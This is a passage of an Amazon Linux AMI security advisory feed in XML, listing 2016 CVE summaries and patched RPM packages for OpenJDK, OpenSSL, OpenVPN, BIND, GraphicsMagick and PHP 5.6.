release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython26-9.2.18-1.59.amzn1.i686.rpm</filename></package><package name="postgresql92-devel" version="9.2.18" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-devel-9.2.18-1.59.amzn1.i686.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.18" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-pltcl-9.2.18-1.59.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-748</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-748: important priority package update for java-1.6.0-openjdk</title><issued date="2016-09-15 19:00:00" /><updated date="2016-09-15 19:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-3606:
Unspecified vulnerability in Oracle Java SE 7u101 and 8u92 and Java SE Embedded 8u91 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to Hotspot.
1356963:
CVE-2016-3606 OpenJDK: insufficient bytecode verification (Hotspot, 8155981)
CVE-2016-3550:
Unspecified vulnerability in Oracle Java SE 6u115, 7u101, and 8u92 and Java SE Embedded 8u91 allows remote attackers to affect confidentiality via vectors related to Hotspot.
1357506:
CVE-2016-3550 OpenJDK: integer overflows in bytecode streams (Hotspot, 8152479)
CVE-2016-3508:
Unspecified vulnerability in Oracle Java SE 6u115, 7u101, and 8u92; Java SE Embedded 8u91; and JRockit R28.3.10 allows remote attackers to affect availability via vectors related to JAXP, a different vulnerability than CVE-2016-3500.
1357015:
CVE-2016-3508 OpenJDK: missing entity replacement limits (JAXP, 8149962)
CVE-2016-3500:
Unspecified vulnerability in Oracle Java SE 6u115, 7u101, and 8u92; Java SE Embedded 8u91; and JRockit R28.3.10 allows remote attackers to affect availability via vectors related to JAXP, a different vulnerability than CVE-2016-3508.
1357008:
CVE-2016-3500 OpenJDK: maximum XML name limit not applied to namespace URIs (JAXP, 8148872)
CVE-2016-3458:
Unspecified vulnerability in Oracle Java SE 6u115, 7u101, and 8u92; and Java SE Embedded 8u91 allows remote attackers to affect integrity via vectors related to CORBA.
1357494:
CVE-2016-3458 OpenJDK: insufficient restrictions on the use of custom ValueHandler (CORBA, 8079718)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3458" title="" id="CVE-2016-3458" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3500" title="" id="CVE-2016-3500" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3508" title="" id="CVE-2016-3508" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3550" title="" id="CVE-2016-3550" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3606" title="" id="CVE-2016-3606" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.6.0-openjdk-devel" version="1.6.0.40" release="1.13.12.6.75.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.40-1.13.12.6.75.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.40" release="1.13.12.6.75.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.40-1.13.12.6.75.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.40" release="1.13.12.6.75.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.40-1.13.12.6.75.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.40" release="1.13.12.6.75.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.40-1.13.12.6.75.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.40" release="1.13.12.6.75.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.40-1.13.12.6.75.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.40" release="1.13.12.6.75.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.40-1.13.12.6.75.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.40" release="1.13.12.6.75.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.40-1.13.12.6.75.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.40" release="1.13.12.6.75.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.40-1.13.12.6.75.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.40" release="1.13.12.6.75.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.40-1.13.12.6.75.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.40" release="1.13.12.6.75.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.40-1.13.12.6.75.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.40" release="1.13.12.6.75.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.40-1.13.12.6.75.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.40" release="1.13.12.6.75.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.40-1.13.12.6.75.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-749</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-749: important priority package update for openssl</title><issued date="2016-09-22 16:00:00" /><updated date="2016-09-26 12:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-6304:
It was discovered that if a client continually requests renegotiation, sending an excessively large OCSP Status Request extension each time, there will be unbounded memory growth on the server, eventually leading to a denial of service through memory exhaustion.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6304" title="" id="CVE-2016-6304" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-static" version="1.0.1k" release="15.95.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.1k-15.95.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.1k" release="15.95.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.1k-15.95.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1k" release="15.95.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.1k-15.95.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.1k" release="15.95.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.1k-15.95.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.1k" release="15.95.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.1k-15.95.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.1k" release="15.95.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.1k-15.95.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1k" release="15.95.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.1k-15.95.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.1k" release="15.95.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.1k-15.95.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.1k" release="15.95.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.1k-15.95.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.1k" release="15.95.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.1k-15.95.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-750</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-750: medium priority package update for openvpn</title><issued date="2016-09-27 10:30:00" /><updated date="2016-09-27 10:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-6329:
Ciphers with 64-bit block sizes used in CBC mode were found to be vulnerable to birthday attack when key renegotiation doesn't happen frequently or at all in long running connections. Blowfish cipher as used in OpenVPN by default is vulnerable to this attack, that allows remote attacker to recover partial plaintext information (XOR of two plaintext blocks).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6329" title="" id="CVE-2016-6329" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openvpn" version="2.3.12" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/openvpn-2.3.12-1.16.amzn1.x86_64.rpm</filename></package><package name="openvpn-debuginfo" version="2.3.12" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/openvpn-debuginfo-2.3.12-1.16.amzn1.x86_64.rpm</filename></package><package name="openvpn-debuginfo" version="2.3.12" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/openvpn-debuginfo-2.3.12-1.16.amzn1.i686.rpm</filename></package><package name="openvpn" version="2.3.12" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/openvpn-2.3.12-1.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-751</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-751: important priority package update for bind</title><issued date="2016-09-28 15:45:00" /><updated date="2016-09-28 15:45:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-2776:
A denial of service flaw was found in the way BIND constructed a response to a query that met certain criteria. A remote attacker could use this flaw to make named exit unexpectedly with an assertion failure via a specially crafted DNS request packet.
1378380:
CVE-2016-2776 bind: assertion failure in buffer.c while building responses to a specifically constructed request
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2776" title="" id="CVE-2016-2776" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-sdb" version="9.8.2" release="0.37.rc1.48.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.37.rc1.48.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.37.rc1.48.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.37.rc1.48.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.37.rc1.48.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.37.rc1.48.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.37.rc1.48.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.37.rc1.48.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.37.rc1.48.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.37.rc1.48.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.37.rc1.48.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.37.rc1.48.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.37.rc1.48.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.37.rc1.48.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.37.rc1.48.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.37.rc1.48.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.37.rc1.48.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.37.rc1.48.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.37.rc1.48.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.37.rc1.48.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.37.rc1.48.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.37.rc1.48.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.37.rc1.48.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.37.rc1.48.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.37.rc1.48.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.37.rc1.48.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.37.rc1.48.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.37.rc1.48.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-752</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-752: medium priority package update for GraphicsMagick</title><issued date="2016-10-12 17:00:00" /><updated date="2016-10-12 17:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-7449:
The TIFF reader had a bug pertaining to use of TIFFGetField() when a 'count' value is returned. The bug caused a heap read overflow (due to using strlcpy() to copy a possibly unterminated string) which could allow an untrusted file to crash the software.
CVE-2016-7448:
The Utah RLE reader did not validate that header information was reasonable given the file size and so it could cause huge memory allocations and/or consume huge amounts of CPU, causing a denial of service.
CVE-2016-7447:
A possible heap overflow was discovered in the EscapeParenthesis() function.
CVE-2016-7446:
Various issues were found in the processing of SVG files in GraphicsMagick.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7446" title="" id="CVE-2016-7446" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7447" title="" id="CVE-2016-7447" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7448" title="" id="CVE-2016-7448" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7449" title="" id="CVE-2016-7449" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="GraphicsMagick-c++" version="1.3.25" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-c++-1.3.25-1.9.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-doc" version="1.3.25" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/GraphicsMagick-doc-1.3.25-1.9.amzn1.noarch.rpm</filename></package><package name="GraphicsMagick" version="1.3.25" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-1.3.25-1.9.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-perl" version="1.3.25" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-perl-1.3.25-1.9.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-c++-devel" version="1.3.25" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-c++-devel-1.3.25-1.9.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-devel" version="1.3.25" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-devel-1.3.25-1.9.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-debuginfo" version="1.3.25" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-debuginfo-1.3.25-1.9.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-c++-devel" version="1.3.25" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-c++-devel-1.3.25-1.9.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-devel" version="1.3.25" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-devel-1.3.25-1.9.amzn1.i686.rpm</filename></package><package name="GraphicsMagick" version="1.3.25" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-1.3.25-1.9.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-c++" version="1.3.25" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-c++-1.3.25-1.9.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-perl" version="1.3.25" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-perl-1.3.25-1.9.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-debuginfo" version="1.3.25" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-debuginfo-1.3.25-1.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-753</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-753: medium priority package update for php56</title><issued date="2016-10-12 17:00:00" /><updated date="2016-10-12 17:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-7418:
The php_wddx_push_element function in ext/wddx/wddx.c in PHP before 5.6.26 and 7.x before 7.0.11 allows remote attackers to cause a denial of service (invalid pointer access and out-of-bounds read) or possibly have unspecified other impact via an incorrect boolean element in a wddxPacket XML document, leading to mishandling in a wddx_deserialize call.
1377352:
CVE-2016-7418 php: Null pointer dereference in php_wddx_push_element
CVE-2016-7417:
ext/spl/spl_array.c in PHP before 5.6.26 and 7.x before 7.0.11 proceeds with SplArray unserialization without validating a return value and data type, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted serialized data.
1377344:
CVE-2016-7417 php: Missing type check when unserializing SplArray
CVE-2016-7416:
ext/intl/msgformat/msgformat_format.c in PHP before 5.6.26 and 7.x before 7.0.11 does not properly restrict the locale length provided to the Locale class in the ICU library, which allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a MessageFormatter::formatMessage call with a long first argument.
1377340:
CVE-2016-7416 php: Stack based buffer overflow in msgfmt_format_message
CVE-2016-7414:
The ZIP signature-verification feature in PHP before 5.6.26 and 7.x before 7.0.11 does not ensure that the uncompressed_filesize field is large enough, which allows remote attackers to cause a denial of service (out-of-bounds memory access) or possibly have unspecified other impact via a crafted PHAR archive, related to ext/phar/util.c and ext/phar/zip.c.
1377336:
CVE-2016-7414 php: Out of bounds heap read when verifying signature of zip phar in phar_parse_zipfile
CVE-2016-7413:
Use-after-free vulnerability in the wddx_stack_destroy function in ext/wddx/wddx.c in PHP before 5.6.26 and 7.x before 7.0.11 allows remote attackers to cause a denial of service or possibly have unspecified other impact via a wddxPacket XML document that lacks an end-tag for a recordset field element, leading to mishandling in a wddx_deserialize call.
1377314:
CVE-2016-7413 php: Use after free in wddx_deserialize
CVE-2016-7412:
ext/mysqlnd/mysqlnd_wireprotocol.c in PHP before 5.6.26 and 7.x before 7.0.11 does not verify that a BIT field has the UNSIGNED_FLAG flag, which allows remote MySQL servers to cause a denial of service (heap-based buffer overflow) or possibly have unspecified other impact via crafted field metadata.
1377311:
CVE-2016-7412 php: Heap overflow in mysqlnd when not receiving UNSIGNED_FLAG in BIT field
CVE-2016-7411:
ext/standard/var_unserializer.re in PHP before 5.6.26 mishandles object-deserialization failures, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via an unserialize call that references a partially constructed object.
1377303:
CVE-2016-7411 php: Memory corruption when destructing deserialized object
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7411" title="" id="CVE-2016-7411" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7412" title="" id="CVE-2016-7412" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7413" title="" id="CVE-2016-7413" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7414" title="" id="CVE-2016-7414" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7416" title="" id="CVE-2016-7416" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7417" title="" id="CVE-2016-7417" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7418" title="" id="CVE-2016-7418" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php56-process" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-intl" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-ldap" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-mbstring" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-common" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-snmp-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-opcache" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.26" release="1.128.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.26-1.128.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-mysqlnd" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-process" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-mbstring" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-pgsql" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.26" release="1.128.amzn1" 